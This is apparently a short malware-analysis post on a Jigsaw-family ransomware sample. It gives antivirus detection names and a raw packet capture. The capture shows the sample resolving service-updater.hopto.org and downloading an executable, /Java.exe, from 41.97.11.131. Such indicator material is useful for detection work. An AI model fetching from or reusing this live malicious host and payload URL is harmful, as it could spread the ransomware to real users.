Avast
FileRepMetagen [Malware]
AVG
FileRepMetagen [Malware]
Avira (no cloud)
Malwarebytes
Ransom.Jigsaw
McAfee-GW-Edition
BehavesLike.Win32.Ransomware.dc
Microsoft
Trojan:Win32/Occamy.C
When executed this ransomware has NO C2 it uses an e-mail address with directions as pictured below:
2020-05-01 16:19:09.841147 IP 192.168.86.1.53 > 192.168.86.25.59527: 12228 1/0/0 A 41.97.11.131 (59) E..W..@.@.if..V…V..5…C.p/…………service-updater.hopto.org…………..;..)a.. 2020-05-01 16:19:09.841596 IP 192.168.86.25.50977 > 41.97.11.131.80: Flags [S], seq 1891890631, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0 E..4f^@…H…V.)a…!.Pp……… ..s………….. 2020-05-01 16:19:10.021362 IP 41.97.11.131.80 > 192.168.86.25.50977: Flags [S.], seq 2051894246, ack 1891890632, win 8192, options [mss 1340,nop,wscale 8,nop,nop,sackOK], length 0 E..4Q.@.*..p)a….V..P.!zMk.p….. ……..<…….. 2020-05-01 16:19:10.021569 IP 192.168.86.25.50977 > 41.97.11.131.80: Flags [.], ack 1, win 16415, length 0 E..(f_@…H…V.)a…!.Pp…zMk.P.@……….. 2020-05-01 16:19:10.022040 IP 192.168.86.25.50977 > 41.97.11.131.80: Flags [P.], seq 1:408, ack 1, win 16415, length 407: HTTP: GET /Java.exe HTTP/1.1 E…f`@…G3..V.)a…!.Pp…zMk.P.@…..GET /Java.exe HTTP/1.1 Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */* Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: service-updater.hopto.org Connection: Keep-Alive
2020-05-01 16:19:10.205818 IP 41.97.11.131.80 > 192.168.86.25.50977: Flags [.], ack 408, win 256, length 0 E..(Q.@...{)a….V..P.!zMk.p.._P…Me…….. 2020-05-01 16:19:10.227305 IP 41.97.11.131.80 > 192.168.86.25.50977: Flags [.], seq 1:1341, ack 408, win 256, length 1340: HTTP: HTTP/1.1 200 OK E..dQ.@. ..>)a….V..P.!zMk.p.._P…….HTTP/1.1 200 OK Date: Fri, 01 May 2020 20:19:30 GMT Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33 Last-Modified: Fri, 01 May 2020 01:06:35 GMT ETag: “48e00-5a48bcaeea16d” Accept-Ranges: bytes Content-Length: 298496 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload
MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..
2020-05-01 16:23:07.891876 IP 192.168.86.25.50993 > 172.217.13.227.80: Flags [P.], seq 1:560, ack 1, win 16560, length 559: HTTP: POST /service/update2?cup2key=10:78626 2356&cup2hreq=b991085be0dfd36bb56c286a65a7bfd50726b800dd7d6bc969c5f8cc18493bf2 HTTP/1.1 E..Wg.@…….V……1.P…I..T.P.@..k..POST /service/update2?cup2key=10:786262356&cup2hreq=b991085be0dfd36bb56c286a65a7bfd50726b800dd7d6bc969c5f8cc18493bf2 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Google Update/1.3.35.452;winhttp;cup-ecdsa X-Goog-Update-AppId: {430FD4D0-B729-4F61-AA34-91526481799D},{8A69D345-D564-463C-AFF1-A69D9E530F96} X-Goog-Update-Updater: Omaha-1.3.35.452 X-Goog-Update-Interactivity: bg X-Last-HR: 0x0 X-Last-HTTP-Status-Code: 0 X-Retry-Count: 0 X-HTTP-Attempts: 1 Content-Length: 1097 Host: update.googleapis.com
Please follow and like us: